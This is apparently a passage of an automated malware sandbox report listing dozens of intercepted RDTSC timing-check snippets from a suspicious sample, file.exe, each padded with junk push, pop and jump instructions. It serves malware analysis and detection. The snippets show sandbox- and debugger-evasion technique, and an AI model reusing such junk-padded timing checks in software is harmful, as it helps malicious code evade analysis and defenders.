Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 646A53 second address: 646A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 646A59 second address: 646A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 646A61 second address: 646A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 646A66 second address: 646A75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F02B8F275E6h 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 646D3B second address: 646D40 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 646EC6 second address: 646ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6471E0 second address: 6471E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 647611 second address: 647615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64E4CB second address: 64E4F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F02B8F2D486h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F02B8F2D496h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64E4F0 second address: 64E4F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64EAD2 second address: 64EADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64EC47 second address: 64EC51 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F02B8F275E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64EDE7 second address: 64EDEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65612A second address: 656142 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65A040 second address: 65A046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65A046 second address: 65A04C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65A04C second address: 65A075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F02B8F2D492h 0x00000012 popad 0x00000013 pushad 0x00000014 jl 00007F02B8F2D486h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 664AD6 second address: 664ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 667534 second address: 667538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 667538 second address: 66753E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 666EF8 second address: 666F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F2D495h 0x00000009 jmp 00007F02B8F2D495h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F02B8F2D486h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 667098 second address: 6670CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F275F4h 0x00000009 jmp 00007F02B8F275F9h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6670CB second address: 6670D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6670D3 second address: 6670DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6670DB second address: 6670FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 jl 00007F02B8F2D49Ch 0x0000000e push ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop ecx 0x00000012 js 00007F02B8F2D492h 0x00000018 jnl 00007F02B8F2D486h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66A8AE second address: 66A8BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F02B8F275E6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66A8BF second address: 66A8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66A8C5 second address: 66A8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 670B31 second address: 670B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F2D497h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 670B4F second address: 670B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F02B8F275E6h 0x0000000a jg 00007F02B8F275E6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 670B5F second address: 670B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F02B8F2D486h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 679DFD second address: 679E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F02B8F275F3h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F02B8F275ECh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 679E26 second address: 679E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 679E31 second address: 679E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 679E37 second address: 679E3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67B51C second address: 67B520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67B520 second address: 67B570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F02B8F2D490h 0x00000013 push eax 0x00000014 jmp 00007F02B8F2D48Ch 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c push ecx 0x0000001d jmp 00007F02B8F2D498h 0x00000022 pop ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 jg 00007F02B8F2D486h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 684ECA second address: 684ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 684ECE second address: 684ED4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 684ED4 second address: 684EDE instructions: 0x00000000 rdtsc 0x00000002 je 00007F02B8F275F2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 684EDE second address: 684EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 683712 second address: 68371C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F02B8F275E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68386C second address: 683873 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 683873 second address: 683887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 683887 second address: 6838A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F02B8F2D494h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6838A0 second address: 6838BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F02B8F275E6h 0x00000009 jmp 00007F02B8F275EFh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 683A9F second address: 683AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68416E second address: 684172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 684172 second address: 684192 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D48Eh 0x00000007 jg 00007F02B8F2D486h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F02B8F2D486h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 684192 second address: 684198 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 684198 second address: 6841A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6841A0 second address: 6841A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 684C08 second address: 684C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 684C10 second address: 684C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6879B1 second address: 6879B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6879B5 second address: 6879B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6879B9 second address: 6879DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F02B8F2D493h 0x0000000d popad 0x0000000e je 00007F02B8F2D4A8h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6875BB second address: 6875C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6923BE second address: 6923CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6923CC second address: 6923DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275EFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 699706 second address: 699712 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F02B8F2D486h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 699712 second address: 699720 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F02B8F275E8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 699720 second address: 699724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 699724 second address: 699755 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F02B8F275E6h 0x00000008 jmp 00007F02B8F275F3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push edx 0x00000013 jng 00007F02B8F275E6h 0x00000019 pop edx 0x0000001a push edi 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e push ecx 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A8E43 second address: 6A8E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A8E47 second address: 6A8E65 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F02B8F275F8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C0CFF second address: 6C0D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C143F second address: 6C1445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C189A second address: 6C18A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C18A3 second address: 6C18A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C18A9 second address: 6C18C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007F02B8F2D493h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C18C9 second address: 6C18D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C18D2 second address: 6C18EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F2D492h 0x00000009 jnl 00007F02B8F2D486h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C18EE second address: 6C18F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C8A53 second address: 6C8A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CA2E0 second address: 6CA30B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 jns 00007F02B8F275F7h 0x0000000d push esi 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop esi 0x00000011 push ebx 0x00000012 ja 00007F02B8F275E6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0140 second address: 5E0144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0378 second address: 5E039E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007F02B8F275EAh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C403C9 second address: 4C403DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F2D48Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C403DB second address: 4C403F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov si, 05C9h 0x0000000e mov bh, ah 0x00000010 popad 0x00000011 mov dword ptr [esp], ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C403F5 second address: 4C403F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C403F9 second address: 4C403FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C403FF second address: 4C40412 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40412 second address: 4C40418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40418 second address: 4C40435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F2D499h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40435 second address: 4C40439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40439 second address: 4C4044A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4044A second address: 4C40450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70497 second address: 4C704C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D499h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, bx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C704C1 second address: 4C704CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C704CF second address: 4C7053C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D48Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F02B8F2D494h 0x00000011 sub eax, 6F2461D8h 0x00000017 jmp 00007F02B8F2D48Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F02B8F2D498h 0x00000023 or esi, 19F5AC38h 0x00000029 jmp 00007F02B8F2D48Bh 0x0000002e popfd 0x0000002f popad 0x00000030 mov ebp, esp 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 movzx eax, di 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7053C second address: 4C7054F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F275EFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70678 second address: 4C7067E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7067E second address: 4C706BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a jmp 00007F02B8F275F7h 0x0000000f je 00007F02B8F27632h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F02B8F275F5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C706E2 second address: 4C70728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D48Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b pushad 0x0000000c mov esi, 62BCE6FBh 0x00000011 mov ah, F7h 0x00000013 popad 0x00000014 pop esi 0x00000015 jmp 00007F02B8F2D493h 0x0000001a leave 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F02B8F2D495h 0x00000022 rdtsc
